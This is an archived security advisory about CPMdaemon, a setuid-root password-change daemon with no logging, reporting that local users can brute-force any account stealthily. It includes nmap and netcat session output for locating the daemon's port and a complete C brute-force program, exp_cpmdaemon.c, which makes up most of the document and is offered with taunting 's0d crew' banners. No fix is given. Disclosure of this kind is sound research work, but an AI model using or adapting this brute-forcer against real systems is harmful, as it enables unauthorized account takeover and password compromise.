TUCoPS :: Linux :: Apps A-M :: cpmd.htm

TUCoPS :: Linux :: Apps A-M :: cpmd.htm
CPMdaemon - no logging etc.
Vulnerability
 CPMdaemon
Affected
 CPMdaemon
Description
 El Nahual (Enrique Alfonso Sanchez Montellano) found following.
 cpmdaemon is a program that runs as a daemon or a cgi (altho
 daemon is recomended on the README file), allowing the change of
 passwords, some accounts have been restricted by the program so
 no unauthorized access can be gained ro priviledged accounts
 (root, bin, daemon, adm, sql, lp, sync, shutdown, halt, mail,
 news, uucp, operator, games, gopher, ftp, nobody, xfs,samba, gdm,
 postgres, squid). Is a fast and very articulate program. Must be
 suid with owner and group root. It can be called as a cgi, calling
 the cgi then connecting to the port already defined.
 The way to change the password is login:oldpasswd*newpassword#
 cpmdaemon has ben coded and in the readme file favors the daemon
 calling of the program so you can also connect and then change
 the password.
 cpmdaemon has no logging at all, is true that only localhost is
 able to change passwords by default, but being a remote password
 administration shurely more hosts will be added (trusted hosts),
 anyway even if localhost is only implemented local users can
 start de daemon and do abrute force on any other user account. If
 runned from within the host (/var/lib/apache/cgi-bin/cpmdaemon.cgi
 on slackware for example) it becomes a true daemon (actually this
 is recommended by the README file by adding it on the rc.local
 file). If its called as a cgi then should be suid root wich is not
 safe at all but at least only lets one try at the time.
 There is no defined port for the application but finding it is
 trivial:
 nahual:~/projects/Check/Vulnerable/cpmdaemon# nmap -sS -p 1-9000 localhost
 
 Starting nmap V. 2.3BETA12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
 Interesting ports on localhost (127.0.0.1):
 Port State Protocol Service
 21 open tcp ftp
 22 open tcp ssh
 23 open tcp telnet
 25 open tcp smtp
 37 open tcp time
 79 open tcp finger
 80 open tcp http
 110 open tcp pop-3
 111 open tcp sunrpc
 113 open tcp auth
 515 open tcp printer
 712 open tcp unknown
 2049 open tcp nfs
 6000 open tcp X11
 8080 open tcp http-proxy
 
 Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds
 nahual:~/projects/Check/Vulnerable/cpmdaemon# nc -vv localhost 80
 localhost [127.0.0.1] 80 (www) open
 GET /cgi-bin/cpmdaemon.cgi HTTP/1.0
 sent 37, rcvd 0
 nahual:~/projects/Check/Vulnerable/cpmdaemon# nmap -sS -p 1-9000 localhost
 
 Starting nmap V. 2.3BETA12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
 Interesting ports on localhost (127.0.0.1):
 Port State Protocol Service
 21 open tcp ftp
 22 open tcp ssh
 23 open tcp telnet
 25 open tcp smtp
 37 open tcp time
 79 open tcp finger
 80 open tcp http
 110 open tcp pop-3
 111 open tcp sunrpc
 113 open tcp auth
 515 open tcp printer
 712 open tcp unknown
 2049 open tcp nfs
 6000 open tcp X11
 8080 open tcp http-proxy
 8088 open tcp unknown
 
 Nmap run completed -- 1 IP address (1 host up) scanned in 10 seconds
 nahual:~/projects/Check/Vulnerable/cpmdaemon# nc -vv localhost 8088
 localhost [127.0.0.1] 8088 (?) open
 CPM Daemon Manager
 sent 0, rcvd 19
 nahual:~/projects/Check/Vulnerable/cpmdaemon#
 Anyway we can see how the port 8088 wasn't there before calling
 the cgi so we can assume that is the port the daemon has been
 defined to run, also it has a very distinctive banner: "CPM Daemon
 Manager", same password as before is also allowed so true
 bruteforcing can be done stealthly:
 nahual:~# nc -vv localhost 8088
 localhost [127.0.0.1] 8088 (?) open
 CPM Daemon Manager
 nahual:notmypasswd*notmypasswd#
 Password Changed
 sent 32, rcvd 36
 nahual:~# telnet localhost
 Trying 127.0.0.1...
 Connected to localhost.
 Escape character is '^]'.
 
 
 
 ### ###
 ## ##
 #### ## #### #### ## ### ### ### #### ### ### ####
 ## ## ## ## ## ## ## ## ## ## ### ## ## ##
 ### ## ##### ## #### ## #### ## ##### ## ######
 ## ## ## ## ## ## ## ### ### ## ## ## ##
 | #### #### ###### #### ### ### ## ## ###### ## #####
 |
 +------------------------------------------ l i n u x
 
 
 nahual login: nahual
 Password:
 Linux 2.2.13.
 No mail.
 
 Any philosophy that can be put in a nutshell belongs there.
 -- Sydney J. Harris
 
 nahual:~$
 Proof of concept code can be also found in www.s0d.org section of
 our programs and on advisories:
 /*
 exp_cpmdaemon.c
 -----------------------
 BY COMPILING THIS PROGRAM YOU HEREBY DECLINE ALL LEGAL AND CIVIL RESPONSABILITY TO THE AUTHOR(S), IF YOU DO NOT COMPLY WITH THIS YOU ARE HEREBY BINDED TO SECURELY ERASE THIS SOURCE.
 
 THIS PROGRAM IS PROOF OF CONCEPT AND FOR EDUCATIONAL PURPOSES ONLY.
 -----------------------
 
 Description:
 
 Program to bruteforce passwords on this little daemon ...
 
 Compile with:
 
 gcc -Wall -o exp-cpmdaemon exp-cpmdaemon.c
 
 or if you want debug gcc:
 
 gcc -Wall -DDEBUG -o exp-cpmdaemon exp-cpmdaemon.c
 
 Authors:
 
 El Nahual
 "int main(void) { write(1, "Tha s0d owns me biatch!", 23); return 0; }"
 
 0x90
 "The louder the music the better the code!"
 */
 
 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
 #include <netdb.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/wait.h>
 #include <sys/stat.h>
 #include <sys/time.h>
 #include <netinet/in.h>
 #include <netdb.h>
 #include <fcntl.h>
 #include <time.h>
 #include <wait.h>
 #include <errno.h>
 
 #define GOTIT "Changed"
 #define KEEPTRYING "Invalid"
 
 /* Definicion de colores */
 #define VERDE "\E[32m"
 #define BRILLOSO "\E[1m"
 #define NORMAL "\E[m"
 #define ROJO "\E[31m"
 #define CELESTE "\E[36m"
 #define AZUL "\E[34m"
 #define AMARILLO "\E[33m"
 #define MORADO "\E[35m"
 
 void usage(char *nombre) {
 printf("%sUsage: %s%s -[dc] -p <port> -l <login> -h <vicitm> \n", ROJO, AMARILLO,nombre);
 printf("%sd:Daemon mode \n", CELESTE);
 printf("l: login name to bruteforce\n");
 printf("h: host to attack \n");
 printf("c: cgi mode %s\n", NORMAL);
 printf("%s.o0{ Passwords should in a file called passwds.s0d }0o.%s\n", AMARILLO, NORMAL);
 }
 
 unsigned long resolver (char *serv) {
 struct sockaddr_in sinn;
 struct hostent *hent;
 
 hent = gethostbyname (serv);
 
 bzero ((char *) &sinn, sizeof (sinn));
 
 memcpy ((char *) &sinn.sin_addr, hent->h_addr, hent->h_length);
 
 return sinn.sin_addr.s_addr;
 }
 
 
 int connex(int victim, int port) {
 int sockfd;
 struct sockaddr_in hostaddr;
 
 if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
 perror("connex");
 exit(-1);
 }
 
 hostaddr.sin_port = htons(port);
 hostaddr.sin_addr.s_addr = victim;
 hostaddr.sin_family = AF_INET;
 
 if((connect(sockfd, (struct sockaddr *) &hostaddr, sizeof(hostaddr))) < 0 ) {
 perror("connex");
 exit(-1);
 }
 
 return sockfd;
 }
 
 
 /*
 The difference between the daemon and the cgi is the calling of the cgi everytime
 */
 
 int daemon_attack(int victim, char *login, char *passwd, int port) {
 int sockfd, retval, i;
 fd_set rfds;
 struct timeval timer;
 char attack[1024], tmp[255];
 
 for(i = 0; i < 1024; i++)
 attack[i] = '0円';
 
 for(i = 0; i < 255; i++)
 tmp[i] = '0円';
 
 /* Ensambling attack */
 
 strcat(attack, login);
 strcat(attack, ":");
 strcat(attack, passwd);
 strcat(attack, "*");
 strcat(attack, passwd);
 strcat(attack, "#");
 strcat(attack, "\n");
 
 #ifdef DEBUG
 printf("Trying login %s with password %s \n", login, passwd);
 #endif
 
 sockfd = connex(victim, port);
 FD_ZERO(&rfds);
 FD_SET(sockfd, &rfds);
 timer.tv_sec = 5;
 timer.tv_usec = 0;
 
 retval = select(sockfd + 1, NULL, &rfds, NULL, &timer);
 
 if(retval) {
 read(sockfd, tmp, sizeof(tmp));
 if(strncmp(tmp, "CPM Daemon Manager", 18) == 0) {
 write(sockfd, attack, strlen(attack));
 read(sockfd, tmp, sizeof(tmp));
 if(strstr(tmp, "Changed") != NULL) {
	 printf("\t%s----------------------------------------\n", VERDE);
	 printf("\t%sUser %s%s%s has passwd %s%s%s %s\n", VERDE, CELESTE, login, VERDE, CELESTE, passwd, VERDE, NORMAL);
	 printf("\t%sTha s0d crew owns you biatch!!!!!!%s\n", VERDE, NORMAL);
	 printf("\t%s----------------------------------------%s\n", VERDE, NORMAL);
	 return 0;
 }
 else {
 
 #ifdef DEBUG
	 printf("%s\n", tmp);
 #endif
	 return 1;
 }
 }
 else {
 printf("Doh! this is not the CPM Daemon manager!\n");
 exit(0);
 }
 }
 else {
 printf("Timeout! \n");
 exit(0);
 }
 
 return 0;
 }
 
 int cgi_attack(int victim, char *login, char *passwd, int port) {
 char call_cgi[255] = "GET /cgi-bin/cpmdaemon.cgi HTTP/1.0 \r\n\r\n";
 int sockfd, retval, i;
 fd_set rfds;
 struct timeval timer;
 char attack[1024], tmp[255];
 
 for(i = 0; i < 1024; i++)
 attack[i] = '0円';
 
 for(i = 0; i < 255; i++)
 tmp[i] = '0円';
 
 /* Ensambling attack */
 
 strcat(attack, login);
 strcat(attack, ":");
 strcat(attack, passwd);
 strcat(attack, "*");
 strcat(attack, passwd);
 strcat(attack, "#");
 strcat(attack, "\n");
 
 #ifdef DEBUG
 printf("attack's value is: %s \n", attack);
 #endif
 
 /* calling the cgi */
 
 sockfd = connex(victim, 80);
 FD_ZERO(&rfds);
 FD_SET(sockfd, &rfds);
 timer.tv_sec = 5;
 timer.tv_usec = 0;
 
 retval = select(sockfd + 1, NULL, &rfds, NULL, &timer);
 
 if(retval) {
 #ifdef DEBUG
 printf("calling the cgi with %s", call_cgi);
 #endif
 write(sockfd, call_cgi, strlen(call_cgi));
 }
 else {
 printf("TIMEOUT!\n");
 exit(-1);
 }
 
 close(sockfd);
 
 /* doing the attack on the pseudodaemon */
 
 #ifdef DEBUG
 printf("Connecting with login %s and passwd %s \n", login, passwd);
 #endif
 
 sockfd = connex(victim, port);
 FD_ZERO(&rfds);
 FD_SET(sockfd, &rfds);
 timer.tv_sec = 5;
 timer.tv_usec = 0;
 
 retval = select(sockfd + 1, NULL, &rfds, NULL, &timer);
 
 if(retval) {
 read(sockfd, tmp, sizeof(tmp));
 if(strncmp(tmp, "CPM Daemon Manager", 18) == 0) {
 write(sockfd, attack, strlen(attack));
 read(sockfd, tmp, sizeof(tmp));
 if(strstr(tmp, "Changed") != NULL) {
	 printf("%sUser %s has passwd %s %s\n", CELESTE, login, passwd, NORMAL);
	 return 0;
 }
 else {
 #ifdef DEBUG
	 printf("%s\n", tmp);
 #endif
	 return 1;
 }
 }
 else {
 printf("Doh! this is not the CPM Daemon manager!\n");
 exit(0);
 }
 }
 else {
 printf("Timeout! \n");
 exit(0);
 }
 
 return 0;
 }
 
 void header(void) {
 printf("%s\t\t\texp_cpmdaemon\n", ROJO);
 printf("\t----------------------------------------------\n");
 printf("%s\t by El Nahual and 0x90 of tha s0d crew\n", AMARILLO);
 printf("\t\ts0d crew owns you biatch!\n");
 printf("%s\t----------------------------------------------%s\n\n", ROJO, NORMAL);
 }
 
 int main(int argc, char **argv) {
 char ch;
 int counter = 1, port, i;
 char *login, *server, tmp[255];
 char daemon = 0; //Daemon enabled by default
 FILE *inFile;
 
 if(argc != 8) {
 usage(argv[0]);
 exit(0);
 }
 
 
 for(i = 0; i < 255; i++)
 tmp[255] = '0円';
 
 while((ch = getopt(argc, argv, "h:,l:,dc,p:")) != EOF) {
 counter++;
 switch(ch) {
 case 'h':
 server = argv[counter + 1];
 break;
 case 'l':
 login = argv[counter];
 break;
 case 'd':
 daemon = 0;
 break;
 case 'c':
 daemon = 1;
 break;
 case 'p':
 port = atoi(argv[counter + 2]);
 break;
 default:
 usage(argv[0]);
 exit(0);
 break;
 }
 }
 
 header();
 
 if((inFile = fopen("passwds.s0d", "r")) == NULL) {
 perror("exp_cpmdaemon.c");
 exit(-1);
 }
 
 (void)fseek(inFile, 0, SEEK_SET);
 
 while(fgets(tmp, 255, inFile) != NULL) {
 
 if(tmp[strlen(tmp) - 1] == '\n')
 tmp[strlen(tmp) - 1] = '0円';
 
 if(daemon == 0) {
 daemon_attack(resolver(server), login, tmp, port);
 }
 else {
 cgi_attack(resolver(server), login, tmp, port);
 }
 
 }
 return 0;
 }
Solution
 Nothing yet.